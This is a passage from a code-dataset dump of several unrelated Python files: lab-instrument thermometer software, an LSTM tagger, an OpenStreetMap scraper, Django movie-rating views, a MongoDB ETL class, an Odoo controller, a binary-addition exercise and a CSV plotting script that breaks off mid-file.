f.write('#AttenuatorSourceImpedance=%f\\n' % self.sourceImpedanceSb.value())\n f.write('#DriveResistance=%f\\n' % self.driveResistanceSb.value())\n f.write('#LeadResistance=%f\\n' % self.leadResistanceSb.value())\n f.write('#PreampGain=%f\\n' % self.preampGainSb.value())\n f.write('#DesiredExcitation=%f\\n' % self.sensorVoltageSb.value())\n k = self.sr830.allSettingValues()\n for key,value in k.iteritems():\n f.write('#SR830/%s=%s\\n' % (key,value))\n f.write('#'+'\\t'.join(['time', 'VsineOut', 'X', 'Y', 'f', 'Sensitivity', 'RxCalc', 'Rtherm'])+'\\n')\n self.fileName = fileName\n \n def snapSignal(self):\n t = time.time()\n try:\n self.sr830.snapSignal()\n except CommunicationsError as e:\n # TODO Log the error\n self.sr830.clearGarbage()\n return\n \n VsineOut = self.sr830.sineOut.value\n X = self.sr830.X\n Y = self.sr830.Y\n f = self.sr830.f\n\n rangeChangeAge = t - self.rangeChangedTime\n exChangeAge = t - self.exChangedTime\n \n sensitivity = self.sr830.sensitivity.value\n \n if self.autoRangingCb.isChecked():\n self.sr830.checkStatus()\n minCode = self.minSensitivityCombo.currentCode()\n currentCode = self.sr830.sensitivity.code\n if self.sr830.overload and rangeChangeAge > 10:\n self.sr830.sensitivity.code = currentCode+1\n self.rangeChangeTime = t\n elif abs(X) > 0.9*sensitivity and rangeChangeAge > 10:\n self.sr830.sensitivity.code = currentCode+1\n self.rangeChangedTime = t\n elif abs(X) < 0.3*sensitivity and rangeChangeAge > 10:\n if currentCode > minCode:\n self.sr830.sensitivity.code = currentCode - 1\n self.rangeChangedTime = t\n elif currentCode < minCode:\n self.sr830.sensitivity.code = minCode\n self.rangeChangedTime = t\n \n \n G1 = self.attenuatorGainSb.value()\n G2 = self.preampGainSb.value()\n Rsource = self.sourceImpedanceSb.value()\n Rd = self.driveResistanceSb.value()\n Rl = self.leadResistanceSb.value()\n Rs = Rsource+Rd+Rl\n\n Vx = X / G2\n \n Vex = VsineOut * G1 # Real excitation\n self.sensorVoltageIndicator.setValue(Vx)\n\n \n Rx = Rs / (Vex/abs(Vx)-1.)\n I = abs(Vx) / Rx\n self.sensorCurrentIndicator.setValue(I)\n P = abs(Vx)*I\n Temp = self.calibration.calculateTemperature([Rx])[0] # @todo This is really a crutch\n \n Tbase = self.calibration.correctForReadoutPower(Temp, P)\n \n if self.publisher is not None:\n if rangeChangeAge > 10 and exChangeAge > 10 and Temp == Temp and Temp > 0 and Temp < 10:\n self.publisher.publishDict(self.sensorName(), {'t': t, 'R': Rx, 'T': Temp, 'P': P, 'Tbase': Tbase})\n #self.publisher.publish('ADR_Sensor_R', Rx)\n #self.publisher.publish('ADR_Temperature', Temp)\n\n # Log data\n with open(self.fileName, 'a+') as of:\n of.write('%.3f\\t%.3f\\t%.5E\\t%.5E\\t%.3f\\t%.1E\\t%.5E\\t%.5E\\n' % (t, VsineOut, X, Y, f, sensitivity, Rx, self.Rthermometer))\n\n self.ts.append(t)\n self.xs.append(X)\n self.ys.append(Y)\n self.fs.append(f)\n self.VsineOuts.append(VsineOut)\n self.Rs.append(Rx)\n self.Vxs.append(Vx)\n self.Ps.append(P)\n self.Ts.append(Temp)\n self.Tbases.append(Tbase)\n\n self.sensorIndicator.setValue(Rx)\n self.temperatureIndicator.setKelvin(Temp)\n self.baseTempIndicator.setKelvin(Tbase)\n self.sensorPowerIndicator.setValue(P)\n self.updateLed.flashOnce()\n self.updatePlot()\n\n # Not sure where this code came from. Seems questionable (FJ)\n # if len(self.Ts) > 2 :\n # dTdt = abs((self.Ts[-1] - self.Ts[-2]) / (self.ts[-1] - self.ts[-2]))\n # if dTdt > 0.1:\n # self.temperatureIndicator.setKelvin('N/A')\n # self.stop()\n \n \n # Perhaps change excitation\n if exChangeAge < 10 or rangeChangeAge < 10 or not self.adjustExcitationCb.isChecked():\n return\n VxDesired = self.sensorVoltageSb.value()\n IDesired = VxDesired / Rx\n VexDesired = IDesired*(Rx+Rs)\n change = (VexDesired-Vex)/Vex\n tolerance = 1E-2*self.toleranceSb.value()\n if abs(change) < tolerance:\n return\n \n VsineOutDesired = VexDesired / G1 # This is what we would like to see\n # What we actually get may be something different\n Vnew = min(5,max(VsineOutDesired,0.004))\n if tolerance == 0 and abs(Vnew - VsineOut) > 0.009: # If a large step is required, do it slowly\n Vnew = (3.*VsineOut+1.*Vnew)/4.\n \n if abs(Vnew - VsineOut) < 0.002:\n return\n self.exChangedTime = t\n self.sr830.sineOut.value = Vnew\n \n def clearData(self):\n self.ts = []\n self.xs = []\n self.ys = []\n self.fs = []\n self.Rs = []\n self.Ps = []\n self.VsineOuts = []\n self.Vxs = []\n self.Ts = []\n self.Tbases = []\n self.updatePlot()\n \n def updatePlot(self):\n yAxis = self.plotYAxisCombo.currentText()\n pl = self.plot\n if yAxis == 'X':\n y = self.xs\n pl.setLabel('left', 'Lock-in X', 'V')\n elif yAxis == 'Y':\n y = self.ys\n pl.setLabel('left', 'Lock-in Y', 'V')\n elif yAxis == 'R':\n y = self.Rs\n pl.setLabel('left', 'R sensor', u'Ω')\n elif yAxis == 'V sine out':\n y = self.VsineOuts\n pl.setLabel('left', 'V sine out', 'V')\n elif yAxis == 'V sensor':\n y = self.Vxs\n pl.setLabel('left', 'V sensor', 'V')\n elif yAxis == 'P sensor':\n y = self.Ps\n pl.setLabel('left', 'P sensor', 'W')\n elif yAxis == 'Sensor temperature':\n y = self.Ts\n pl.setLabel('left', 'T sensor', 'K')\n elif yAxis == 'Base temperature':\n y = self.Tbases\n pl.setLabel('left', 'T base', 'K')\n \n x = self.ts\n self.curve.setData(x, y)\n\ndef setAppId(name):\n import ctypes\n myappid = u'WISCXRAYASTRO.ADR3.%s.1' % name # arbitrary string\n ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid) \n \n\nif __name__ == '__main__':\n import logging\n logging.basicConfig(level=logging.WARN)\n \n from PyQt4.QtGui import QApplication\n app = QApplication([])\n app.setApplicationName('Lockin Thermometer')\n app.setApplicationVersion('0.2')\n app.setOrganizationDomain('wisp.physics.wisc.edu')\n app.setOrganizationName('McCammon X-ray Astrophysics')\n \n setAppId('LockInThermometer')\n \n mainWindow = LockinThermometerWidget()\n \n icon = QIcon('Icons/LockinThermometer.ico')\n mainWindow.setWindowIcon(icon)\n mainWindow.show()\n app.exec_()\n ","sub_path":"LockinThermometer.py","file_name":"LockinThermometer.py","file_ext":"py","file_size_in_byte":18238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"469214371","text":"#!/usr/bin/python\r\n# -*- coding: sjis -*-\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nimport torch.nn.functional as F\r\nimport numpy as np\r\n\r\nimport pickle\r\n\r\n###################\r\n\r\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n##################\r\n\r\nwith open('dic.pkl','br') as f:\r\n dic = pickle.load(f)\r\n\r\nlabels = {'名詞': 0, '助詞': 1, '形容詞': 2,\r\n '助動詞': 3, '補助記号': 4, '動詞': 5, '代名詞': 6,\r\n '接尾辞': 7, '副詞': 8, '形状詞': 9, '記号': 10,\r\n '連体詞': 11, '接頭辞': 12, '接続詞': 13,\r\n '感動詞': 14, '空白': 15}\r\n\r\n# Data setting\r\n\r\nwith open('xtrain.pkl','br') as f:\r\n xtrain = pickle.load(f)\r\n\r\nwith open('ytrain.pkl','br') as f:\r\n ytrain = pickle.load(f)\r\n\r\n# Define model\r\n\r\nclass MyLSTM(nn.Module):\r\n def __init__(self, vocsize, posn, hdim):\r\n super(MyLSTM, self).__init__()\r\n self.embd = nn.Embedding(vocsize, hdim)\r\n self.lstm = nn.LSTM(input_size=hdim, hidden_size=hdim)\r\n self.ln = nn.Linear(hdim, posn)\r\n def forward(self, x):\r\n x = self.embd(x)\r\n lo, (hn, cn) = self.lstm(x)\r\n out = self.ln(lo)\r\n return out\r\n\r\n# model generate, optimizer and criterion setting\r\n\r\nnet = MyLSTM(len(dic)+1, len(labels), 100).to(device)\r\noptimizer = optim.SGD(net.parameters(),lr=0.01)\r\ncriterion = nn.CrossEntropyLoss()\r\n\r\n# Learn\r\n\r\nfor ep in range(1,11):\r\n loss1K = 0.0\r\n for i in range(len(xtrain)):\r\n x = [ xtrain[i] ]\r\n x = torch.LongTensor(x).to(device)\r\n output = net(x)\r\n y = torch.LongTensor( ytrain[i] ).to(device)\r\n loss = criterion(output[0],y)\r\n if (i % 1000 == 0):\r\n print(i, loss1K)\r\n loss1K = loss.item()\r\n else:\r\n loss1K += loss.item()\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n outfile = \"lstm0-\" + str(ep) + \".model\"\r\n torch.save(net.state_dict(),outfile)\r\n","sub_path":"pytorch-nlp/Chapter3/LSTM/lstm0.py","file_name":"lstm0.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"626882174","text":"import Config\nimport numpy as np\nimport lxml.etree as ET\nimport os, sys, time, requests\n\nclass BuildingListConstructor(object):\n\tdef __init__(self, num_vertices_range, filename = None):\n\t\tself.building = {}\n\t\tself.num_vertices_range = num_vertices_range\n\t\tassert(num_vertices_range[0] >= 3)\n\t\tassert(num_vertices_range[0] <= num_vertices_range[1])\n\t\tif os.path.exists(filename):\n\t\t\tself.loadBuildingList(filename)\n\t\tself.filename = filename\n\t\treturn\n\n\tdef getBuildingIDListSorted(self):\n\t\tli = [item for item in self.building]\n\t\tli.sort()\n\t\treturn li\n\n\tdef getBuilding(self, building_id):\n\t\treturn self.building[building_id]\n\n\tdef getBuildingList(self):\n\t\treturn [self.building[item] for item in self.building]\n\n\tdef saveBuildingList(self, filename):\n\t\tnp.save(filename, self.building)\n\t\treturn\n\n\tdef printBuildingList(self, show_list = False):\n\t\tif show_list:\n\t\t\tprint(self.building)\n\t\tprint('Totally %d buidings.' % len(self.building))\n\t\treturn\n\n\tdef loadBuildingList(self, filename):\n\t\td = np.load(filename).item()\n\t\tfor bid in d:\n\t\t\tif bid in self.building:\n\t\t\t\tassert(len(self.building[bid]) == len(d[bid]))\n\t\t\telse:\n\t\t\t\tbuilding = d[bid]\n\t\t\t\tif len(building) >= self.num_vertices_range[0] and len(building) <= self.num_vertices_range[1]:\n\t\t\t\t\tself.building[bid] = building\n\t\tself.printBuildingList()\n\t\treturn\n\n\tdef addBuildingList(self, left, up, right, down):\n\t\t# \n\t\twhile True:\n\t\t\ttime.sleep(1)\n\t\t\ttry:\n\t\t\t\tosm = requests.get(\n\t\t\t\t\t'http://www.openstreetmap.org/api/0.6/map?bbox=' + \\\n\t\t\t\t\t'%.7lf%%2C%.7lf%%2C%.7lf%%2C%.7lf' % (left, down, right, up)\n\t\t\t\t).content\n\t\t\t\tosm = ET.fromstring(osm)\n\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\tprint('Try again to get .osm file.')\n\t\t\t\ttime.sleep(10)\n\n\t\t# \n\t\tnode = {}\n\t\thole = {}\n\t\tfor item in osm:\n\t\t\tif item.tag == 'node':\n\t\t\t\tid_str = item.attrib.get('id')\n\t\t\t\tlon = item.attrib.get('lon')\n\t\t\t\tlat = item.attrib.get('lat')\n\t\t\t\tif id_str and lon and lat:\n\t\t\t\t\tnode[int(id_str)] = (float(lon), float(lat))\n\t\t\t\tcontinue\n\t\t\tif item.tag == 'relation':\n\t\t\t\tfor sub_item in item:\n\t\t\t\t\tif sub_item.tag == 'member':\n\t\t\t\t\t\tref = sub_item.attrib.get('ref')\n\t\t\t\t\t\trole = sub_item.attrib.get('role')\n\t\t\t\t\t\tif ref and role == 'inner':\n\t\t\t\t\t\t\thole[int(ref)] = None\n\n\t\t#\n\t\tfor item in osm:\n\t\t\tif item.tag == 'way':\n\t\t\t\tif item.attrib.get('visible') == 'true':\n\t\t\t\t\tnode_list = []\n\t\t\t\t\td = {}\n\t\t\t\t\tfor sub_item in item:\n\t\t\t\t\t\tif sub_item.tag == 'nd':\n\t\t\t\t\t\t\tref = sub_item.attrib.get('ref')\n\t\t\t\t\t\t\tif ref:\n\t\t\t\t\t\t\t\tnode_list.append(node[int(ref)])\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tif sub_item.tag == 'tag':\n\t\t\t\t\t\t\tk = sub_item.attrib.get('k')\n\t\t\t\t\t\t\tv = sub_item.attrib.get('v')\n\t\t\t\t\t\t\tif k and v:\n\t\t\t\t\t\t\t\td[k] = v\n\t\t\t\t\tif 'building' in d:\n\t\t\t\t\t\tnode_list = node_list[: -1]\n\t\t\t\t\t\tif len(node_list) >= self.num_vertices_range[0] and len(node_list) <= self.num_vertices_range[1]:\n\t\t\t\t\t\t\tbid = int(item.attrib.get('id'))\n\t\t\t\t\t\t\tif bid in self.building:\n\t\t\t\t\t\t\t\tassert(len(self.building[bid]) == len(node_list))\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tif bid not in hole:\n\t\t\t\t\t\t\t\t\tself.building[bid] = node_list\n\t\treturn\n\n\tdef batchAddBuildingList(self, city_info):\n\t\tlon, lat = city_info['center']\n\t\tdx, dy = city_info['step']\n\t\tx1, x2 = city_info['xrange']\n\t\ty1, y2 = city_info['yrange']\n\t\tfor x in range(x1, x2):\n\t\t\tfor y in range(y1, y2):\n\t\t\t\tprint('Step', x, y)\n\t\t\t\tself.addBuildingList(\n\t\t\t\t\tleft = lon + dx * x,\n\t\t\t\t\tup = lat + dy * y,\n\t\t\t\t\tright = lon + dx * x + dx,\n\t\t\t\t\tdown = lat + dy * y + dy,\n\t\t\t\t)\n\t\t\t\tself.printBuildingList()\n\t\t\t\tself.saveBuildingList(self.filename)\n\t\treturn\n\nif __name__ == '__main__':\n\tassert(len(sys.argv) == 2)\n\tconfig = Config.Config()\n\tcity_name = sys.argv[1]\n\tobjCons = BuildingListConstructor(num_vertices_range = (4, 20), filename = './BuildingList%s.npy' % city_name)\n\tobjCons.batchAddBuildingList(config.CITY_COO[city_name])\n","sub_path":"DataPreparation/GetBuildingListOSM.py","file_name":"GetBuildingListOSM.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"241291242","text":"from django.db.models import Count, Avg\nfrom django.forms import model_to_dict\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.views.generic import ListView\nfrom .models import Rating, Movie, Rater\nfrom django.contrib.auth.models import User\nfrom pymdb.forms import UserForm, RaterForm, RatingForm\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib import messages\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\n# TODO: Possible features:\n# Most active users (add to index using bootstrap columns)\n# Both in terms of most ratings and most reviews\n# Suggested movies\n# |-> Correlation curve using Pandas with generated similar movies\n# +Jumbotron image (requires css)\n# Alternating colors on rows, maybe tables? What layout would look good?\n\n# FIXME: Prevent multiple users from logging in simultaneously\ndef show_genre(request, genre_id):\n movies = Movie.objects.filter(genre=genre_id) \\\n .annotate(rating_avg=Avg('rating__rating')) \\\n .annotate(rating_count=Count('rating__rating')) \\\n .filter(rating_count__gte=10) \\\n .order_by('-rating_avg')[:20] # TODO: Add lt 10 movies separately\n genre = movies[0].genre\n return render(request,\n \"pymdb/genre.html\",\n {\"movies\": movies})\n\n\ndef index(request):\n # movies = Rating.top_rated(20)\n # movies = Movie.objects.values('id').annotate(rating_count=Count('rating')).order_by('-rating_count')[:20]\n # Employer.objects.values('id').annotate(jobtitle_count=Count('jobtitle')).order_by('-jobtitle_count')[:5]\n movies = Movie.objects.annotate(rating_avg=Avg('rating__rating')).annotate(\n rating_count=Count('rating__rating')).filter(\n rating_count__gte=10).order_by('-rating_avg')[:10]\n most_rated = Movie.objects.annotate(\n rating_avg=Avg('rating__rating')).annotate(\n rating_count=Count('rating__rating')).order_by('-rating_count')[:10]\n # counts = movies.\n # Item.objects.annotate(type_count=models.Count(\"type\")).filter(type_count__gt=1).order_by(\"-type_count\")\n\n # statuses = Status.objects.annotate(Count('favorite')).order_by('-posted_at')\n return render(request,\n \"pymdb/index.html\",\n {\"movies\": movies,\n \"most_rated\": most_rated,\n })\n\nclass MovieListView(ListView):\n template_name = \"pymdb/movie_list.html\"\n model = Movie\n context_object_name = 'movies'\n queryset = Movie.objects.annotate(rating_avg=Avg('rating__rating')).annotate(\n rating_count=Count('rating__rating')).filter(\n rating_count__gte=10).order_by('-rating_avg') # FIXME: How to speed up this query?\n paginate_by = 20\n header = \"Top Rated Movies\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"header\"] = self.header\n # if self.request.user.is_authenticated():\n # favorites = self.request.user.favorited_updates.all()\n # else:\n # favorites = []\n # context[\"favorites\"] = favorites\n return context\n\ndef show_rater(request, rater_id):\n rater = Rater.objects.get(pk=rater_id)\n # ratings = sorted(rater.my_ratings(), key=lambda x: x.rating, reverse=True)\n ratings = Rating.objects.filter(rater=rater).order_by('-time_added').select_related()\n return render(request,\n 'pymdb/user.html',\n {'rater': rater,\n 'ratings': ratings,\n })\n\n\n# FIXME: 'AnonymousUser' object has no attribute 'rater'\ndef show_movie(request, movie_id):\n movie = Movie.objects.get(pk=movie_id)\n # ratings = movie.sorted_ratings()\n ratings = movie.rating_set.all().order_by('-time_added').select_related()\n num_ratings = movie.rating_count()\n\n # FIXME: Rewrite to use a single query instead of many\n try:\n rater = None\n rater = request.user.rater\n r = Rating.objects.get(rater=rater, movie=movie)\n except (ObjectDoesNotExist, AttributeError):\n r = None\n\n if request.method == \"GET\":\n if r:\n rating_form = RatingForm(instance=r)\n else:\n rating_form = RatingForm()\n elif request.method == \"POST\":\n if r:\n rating_form = RatingForm(request.POST, instance=r)\n else:\n rating_form = RatingForm(request.POST)\n # rating_form.rater = rater # Can't do this until after an uncommitted save...\n # rating_form.movie = movie\n if rating_form.is_valid() and not request.user.is_anonymous():\n # FIXME: Add error message for anon user trying to rate\n rating = rating_form.save(commit=False)\n rating.rater = rater\n rating.movie = movie\n # rating.save()\n # debug = [(x, getattr(rating_form, x)) for x in dir(rating_form)[65:]] #strike 4,65 >65 ok\n # debug2 = (dir(rating_form)[4], dir(rating_form)[65])\n # bug = 1/0\n rating_form.save()\n messages.add_message(request, messages.SUCCESS,\n \"Your rating has been saved. Thank you for contributing!\")\n\n\n return render(request,\n 'pymdb/movie.html',\n {'movie': movie,\n 'ratings': ratings,\n 'num_ratings': num_ratings,\n 'rating_form': rating_form,\n })\n\n\ndef user_register(request):\n if request.method == \"GET\":\n user_form = UserForm()\n rater_form = RaterForm()\n elif request.method == \"POST\":\n user_form = UserForm(request.POST)\n rater_form = RaterForm(request.POST)\n if user_form.is_valid() and rater_form.is_valid():\n user = user_form.save()\n rater = rater_form.save(commit=False)\n rater.user = user\n rater.save()\n\n password = user.password\n # The form doesn't know to call this special method on user.\n user.set_password(password)\n user.save()\n\n # You must call authenticate before login. :(\n user = authenticate(username=user.username,\n password=password)\n login(request, user)\n messages.add_message(\n request,\n messages.SUCCESS,\n \"Congratulations, {}, on creating your new account! You are now logged in.\".format(\n user.username))\n return redirect('index')\n return render(request, \"pymdb/register.html\", {'user_form': user_form,\n 'rater_form': rater_form})\n\n\nfrom django.contrib.auth import logout\n\n\ndef logout_view(request):\n logout(request)\n messages.add_message(request, messages.SUCCESS,\n \"You have successfully logged out of PyMDb.\")\n\n return redirect('index')\n\n# def rate(request, movie_id, user):\n# if request.method == \"GET\":\n# rating_form = RatingForm()\n# # FIXME: Add redirect here? Does this ever run?\n# elif request.method == \"POST\":\n# r = Rating.objects.get(pk=1)\n# rating_form = RatingForm(request.POST, instance=r)\n# if rating_form.is_valid():\n# rating = rating_form.save(commit=False)\n# rating.save()\n# # rater.user = user\n# # rater.save()\n# #\n# # messages.add_message(\n# # request,\n# # messages.SUCCESS,\n# # \"Congratulations, {}, on creating your new account! You are now logged in.\".format(\n# # user.username))\n# # return redirect('index')\n# return render(request, \"movie\", {'rating_form': rating_form, # FIXME: Add redirect\n# })\n# # return redirect('index')\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\nimport matplotlib\nmatplotlib.style.use('ggplot')\n\ndef ratings_chart(request):\n ratings = Rating.objects.all()\n df = pd.DataFrame(model_to_dict(rating) for rating in ratings)\n df['count'] = 1\n df.index = df['time_added']\n counts = df['count']\n counts = counts.sort_index()\n series = pd.expanding_count(counts).resample('W', how=np.max, fill_method='pad')\n response = HttpResponse(content_type='image/png')\n\n fig = plt.figure()\n # ax = fig.add_subplot(111)\n # ax.plot(series)\n series.plot()\n plt.title(\"Total ratings over time\")\n plt.xlabel(\"\")\n canvas = FigureCanvas(fig)\n canvas.print_png(response)\n return response\n","sub_path":"movieratings/pymdb/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"217141194","text":"import datetime\nimport re\n\nimport pymongo\n\nfrom core.Mssql import Mssql\n\n\n# 操作MongoDB使用到了pymongo,应该先浏览一下官方的教程\n\nclass Mongodb:\n def __init__(self, db, collection, target, incremental=False):\n # 创建数据库连接,采取默认安装时没有用户名密码,所以可以不传参数\n self.client = pymongo.MongoClient()\n self.db = self.client[db]\n self.collection = self.db[collection]\n\n self.target = target\n self.incremental = incremental\n\n if target:\n target_table_name = target.table.name\n else:\n target_table_name = ''\n\n # 增量抽取的原理是在文档(表)中添加一个字段来标记是否导入过目标表\n self.incremental_record_name = '{}_to_{}'.format(self.collection,\n target_table_name)\n self.fields_map = {}\n self.filters = {}\n self.filters_tuple = []\n\n # 统计信息\n self.drop_count = 0\n self.merge_count = 0\n\n # 标签\n self.tag = None\n\n # 返回字符串表示\n def __str__(self):\n if self.db and self.collection:\n return 'Mongo:{}.{}'.format(self.db.name, self.collection.name)\n else:\n return 'Mongo'\n\n def add_map(self, source_name, target_name):\n if target_name not in self.target.get_current_table_detail():\n return False\n if target_name in self.fields_map:\n return False\n self.fields_map[target_name] = source_name\n return True\n\n # 请简单看一下mongodb/pymongo的查询语法\n def add_filter(self, source_name, filter_type, value):\n # float, int, date\n if filter_type == 'gt':\n self.filters[source_name] = {\n '$gt': value\n }\n # float, int, date\n elif filter_type == 'ge':\n self.filters[source_name] = {\n '$gte': value\n }\n # float, int, date\n elif filter_type == 'lt':\n self.filters[source_name] = {\n '$lt': value\n }\n # float, int, date\n elif filter_type == 'le':\n self.filters[source_name] = {\n '$lte': value\n }\n # float, int, bool, string, date\n elif filter_type == 'eq':\n self.filters[source_name] = {\n '$eq': value\n }\n # string\n elif filter_type == 'contain':\n self.filters[source_name] = re.compile(value)\n # string\n elif filter_type == 'notcontain':\n self.filters[source_name] = {\n '$not': re.compile(value)\n }\n\n # 提取到数据库\n def merge_to_target(self):\n merge_count = 0\n drop_count = 0\n for row in self.collection.find(self.filters):\n if self.incremental:\n # 如果id已经存在增量信息表中,丢弃\n if row.get(self.incremental_record_name):\n drop_count += 1\n continue\n # 更新增量信息表\n else:\n self.collection.update_one(\n {\"_id\": row[\"_id\"]},\n {\"$set\": {self.incremental_record_name: True}}\n )\n\n data = [(target_name, row.get(self.fields_map[target_name]))\n for target_name in self.fields_map]\n print(data)\n if not data:\n continue\n ins = self.target.table.insert()\n self.target.conn.execute(ins, dict(data))\n merge_count += 1\n self.merge_count = merge_count\n self.drop_count = drop_count\n\n\nif __name__ == '__main__':\n target = Mssql('sa', '132132qq', 'a')\n target.connect_db()\n target.set_table('studenta')\n mongo = Mongodb('fake', 'fake', target, incremental=True)\n mongo.add_map('name_mongo', 'name1')\n mongo.add_map('age_mongo', 'age1')\n mongo.add_map('salary_mongo', 'salary1')\n mongo.add_map('birthday_mongo', 'birthday1')\n mongo.add_filter('birthday_mongo', 'gt', datetime.datetime(2000, 1, 1))\n mongo.merge_to_target()\n","sub_path":"core/Mongodb.py","file_name":"Mongodb.py","file_ext":"py","file_size_in_byte":4239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"237037763","text":"# -*- coding: utf-8 -*-\nfrom odoo import http\nfrom odoo.http import request\n\nclass AbsolutepianoModiferPoscustomer(http.Controller):\n\n @http.route('/web/pos/client_info', auth='public', type='json',)\n def get_client_info(self, **kw):\n singapore = request.env.ref('base.sg')\n country_code = request.env['partner.country.code'].search([('country','=',singapore.id)], limit=1)\n return {\n 'country' : [singapore.id, singapore.name],\n 'country_code' : [country_code.id, country_code.name] if country_code else False,\n }\n","sub_path":"beta-dev1/absolutepiano_reusable_poscustomer/controllers/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"104019513","text":"class Solution:\n # Given two binary strings, return their sum (also a binary string).\n # Example a = 11 b = 1 Return 100\n # @param {string} a a number\n # @param {string} b a number\n # @return {string} the result\n def addBinary(self, a, b):\n # Write your code here\n if not a:\n return b\n if not b:\n return a\n if len(a) < len(b):\n s, l = a, b\n else:\n s, l = b, a\n stack = []\n result = \"\"\n for i in range(len(l) - 1, -1, -1):\n stack.append(l[i])\n for m in range(len(s) - 1, -1, -1):\n if s[m] == \"1\":\n for n in range(len(s) - 1 - m, len(stack)):\n if stack[n] == \"1\":\n stack[n] = \"0\"\n else:\n stack[n] = \"1\"\n break\n if stack[len(stack) - 1] == \"0\":\n stack.append(\"1\")\n for j in range(0, len(stack)):\n result += stack.pop()\n return result\n","sub_path":"(408) Add Binary.py","file_name":"(408) Add Binary.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"596878953","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Dec 20 12:14:42 2019\r\n@author: melingk1\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n#%matplotlib inline\r\nimport matplotlib.pyplot as plt\r\n#import matplotlib.dates as md\r\nimport datetime as dt\r\nimport time\r\nfrom datetime import datetime\r\nfrom os import scandir\r\nimport os\r\nfrom pathlib import Path\r\nimport math\r\n\r\n\r\n#function to check if csv date is in 24 hr and european style format\r\ndef formatting_check24hr_nor(input):\r\n try:\r\n time.strptime(input,'%d.%m.%Y %H:%M:%S')\r\n except:\r\n return False\r\n else:\r\n return True\r\n \r\n#function to check if csv date is in murica format\r\ndef formatting_check12hr_american(input):\r\n try:\r\n time.strptime(input,'%m/%d/%Y %I:%M:%S %p')\r\n except:\r\n return False\r\n else:\r\n return True\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# =============================================================================\r\n# def convert_date(timestamp):\r\n# d = datetime.utcfromtimestamp(timestamp)\r\n# formated_date = d.strftime('%d %b %Y')\r\n# return formated_date\r\n# =============================================================================\r\n#import the contents of a folder\r\n# =============================================================================\r\n# \r\n# def get_files():\r\n# dir_entries = scandir('C:/Users/Kristoffer/Desktop/python/testing')\r\n# for entry in dir_entries:\r\n# if entry.is_file():\r\n# info = entry.stat()\r\n# print(f'{entry.name}\\t Last Modified: {convert_date(info.st_mtime)}')\r\n# \r\n# =============================================================================\r\n\r\n#def parse_and_print(f_name):\r\n\r\nf_name='dPinletAandB3month.csv'\r\nindex = pd.read_csv(f_name,nrows = 0, delimiter =\" \")\r\ndf = pd.read_csv(f_name,skiprows=1 ,delimiter=\"\\t\")\r\n\r\ncol=df.columns\r\n\r\n\r\nif col.size>=3:\r\n varA=df.loc[:,col[1]]\r\n date=df.loc[:,col[0]]\r\n varB=df.loc[:,col[2]]\r\n \r\nelif col.size >= 2: \r\n varA=df.loc[:,col[1]]\r\n date=df.loc[:,col[0]]\r\n \r\nelif col.size>=1:\r\n date=df.loc[:,col[0]]\r\n \r\n#the available date formats\r\nformattAMPM = '%m/%d/%Y %I:%M:%S %p'\r\nformatt24hr = '%d.%m.%Y %H:%M:%S'\r\n\r\n#check what format the data is\r\nif formatting_check24hr_nor(date[1]):\r\n dates=[datetime.strptime(date,formatt24hr) for date in date]\r\nelif formatting_check12hr_american(date[1]):\r\n dates=[datetime.strptime(date,formattAMPM) for date in date]\r\n#if csv use comma as decimal delimiter, then this must be changed to \".\" \r\nif isinstance(varA[0],str):\r\n varA[:] = varA.replace(',','.', regex=True)\r\n varA[:]=varA.astype(float)\r\nif isinstance(varB[0],str):\r\n varB[:] = varB.replace(',','.', regex=True)\r\n varB[:]=varB.astype(float)\r\n\r\nvarA_average = varA.mean() \r\nvarB_average = varB.mean() \r\navg_diff = abs(varA_average - varB_average)\r\n\r\n#decide if both column A and B contain valid values that can be plotted\r\nif 'varB'in globals() and not math.isnan(varA[0]) and not math.isnan(varB[0]):\r\n if avg_diff > 200:\r\n fig, ax1 = plt.subplots()\r\n ax1.set_ylabel(col[1])\r\n ax1.plot(dates,varA)\r\n \r\n ax2 = ax1.twinx()\r\n ax2.set_ylabel(col[2])\r\n ax2.plot(dates,varB)\r\n #fig.thight_layout()\r\n plt.xlabel('Dates')\r\n plt.xticks(rotation=45)\r\n #plt.show()\r\n \r\n else:\r\n plt.ylabel(col[1]+' '+ col[2])\r\n plt.plot(dates,varA)\r\n plt.plot(dates,varB)\r\n plt.xlabel('Dates')\r\n plt.xticks(rotation=45)\r\n \r\n \r\n\r\n\r\n \r\nelif not math.isnan(varA[0]):\r\n plt.ylabel(col[1])\r\n plt.plot(dates, varA)\r\n plt.xlabel('Dates')\r\n 